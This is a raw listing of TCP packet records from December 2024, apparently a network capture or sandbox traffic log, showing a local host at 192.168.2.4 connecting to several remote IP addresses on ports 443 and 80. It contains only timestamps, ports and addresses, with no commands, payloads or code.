                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.177710056 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.223335028 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.232304096 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.232315063 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.279191017 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.439956903 CET44349756142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.440373898 CET49756443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.440396070 CET44349756142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.443943977 CET44349756142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.444025993 CET49756443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.444418907 CET49756443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.444586992 CET49756443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.444610119 CET44349756142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.479991913 CET44349754142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.480060101 CET44349754142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.480123997 CET49754443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.480190039 CET44349754142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.485934973 CET44349754142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.486021042 CET49754443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.486048937 CET44349754142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.488636017 CET44349754142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.488837004 CET49754443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.488905907 CET49754443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.488935947 CET44349754142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.497637987 CET49756443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.497654915 CET44349756142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.539308071 CET44349757142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.539544106 CET49757443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.539577007 CET44349757142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.541080952 CET44349757142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.541138887 CET49757443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.541575909 CET49757443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.541657925 CET44349757142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.544492960 CET49756443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.591352940 CET49757443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.591381073 CET44349757142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.640237093 CET49757443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.058228970 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.058264971 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.058363914 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.058398008 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.058612108 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.059257030 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.059267044 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.066205978 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.066907883 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.066915035 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.107444048 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.146775961 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.156847000 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.157399893 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.157440901 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.167603016 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.168761015 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.168781042 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.216782093 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.245769024 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.250010014 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.251363993 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.251372099 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.264198065 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.265973091 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.265979052 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.273966074 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.274027109 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.274033070 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.283768892 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.284019947 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.284027100 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.297568083 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.297643900 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.297652006 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.304359913 CET44349756142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.304765940 CET44349756142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.305016041 CET49756443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.306571007 CET49756443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.306607962 CET44349756142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.311156034 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.311198950 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.311206102 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.340495110 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.340543032 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.340555906 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.351783991 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.351830006 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.351839066 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.365169048 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.366996050 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.367007971 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.413146973 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.413156033 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.433154106 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.433834076 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.433841944 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.445344925 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.445425987 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.445507050 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.445524931 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.445561886 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.462568045 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.467329979 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.467348099 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.467386961 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.467392921 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.467427969 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.480931997 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.493586063 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.493648052 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.493695974 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.493705988 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.493746042 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.505184889 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.516343117 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.516367912 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.518743992 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.518755913 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.518800020 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.527242899 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.527384043 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.527928114 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.527935028 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.537597895 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.537636995 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.537643909 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.547463894 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.547631979 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.547641039 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.554693937 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.554754972 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.554763079 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.561939955 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.561979055 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.561985970 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.568996906 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.569555998 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.569564104 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.576293945 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.576337099 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.576349020 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.583515882 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.584093094 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.584100962 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.590734959 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.590792894 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.590800047 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.600687981 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.600733042 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.600739956 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.605174065 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.605218887 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.605223894 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.612373114 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.612416983 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.612423897 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.620791912 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.621043921 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.621051073 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.635921955 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.635967970 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.635973930 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.637279034 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.637331009 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.637336016 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.639746904 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.639836073 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.639842033 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.649838924 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.649888039 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.649894953 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.654299021 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.654349089 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.654355049 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.659712076 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.659796000 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.659801960 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.672882080 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.672930002 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.672936916 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.685689926 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.685734987 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.685741901 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.697092056 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.697141886 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.697149038 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.708209991 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.708257914 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.708264112 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.709331989 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.709377050 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.709383011 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.719243050 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.719290972 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.719295979 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.719336987 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.719511986 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.719516993 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.719644070 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.719692945 CET44349755142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:39.719744921 CET49755443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:40.022434950 CET804972944.206.23.126192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:40.022537947 CET4972980192.168.2.444.206.23.126
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:40.022614956 CET4972980192.168.2.444.206.23.126
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:40.142385006 CET804972944.206.23.126192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:40.889398098 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:40.889465094 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:40.889578104 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:40.889841080 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:40.889857054 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:41.912766933 CET49757443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:42.291841984 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:42.291924953 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:42.292356968 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:42.292392015 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:42.294210911 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:42.294225931 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:42.361593962 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:42.361646891 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:42.362035036 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:42.362255096 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:42.362271070 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.350522995 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.350598097 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.350668907 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.351351023 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.351394892 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.379709959 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.379798889 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.379878998 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.380064011 CET49769443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.380100965 CET4434976994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.767889023 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.768023014 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.768572092 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.768585920 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770133972 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770140886 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770222902 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770245075 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770251989 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770268917 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770344019 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770370007 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770382881 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770390987 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770505905 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770529032 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770543098 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770548105 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770555973 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770638943 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770648003 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770654917 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770688057 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770704031 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770755053 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770762920 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770787001 CET49768443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770796061 CET4434976894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:43.770821095 CET49768443192.168.2.494.130.188.57
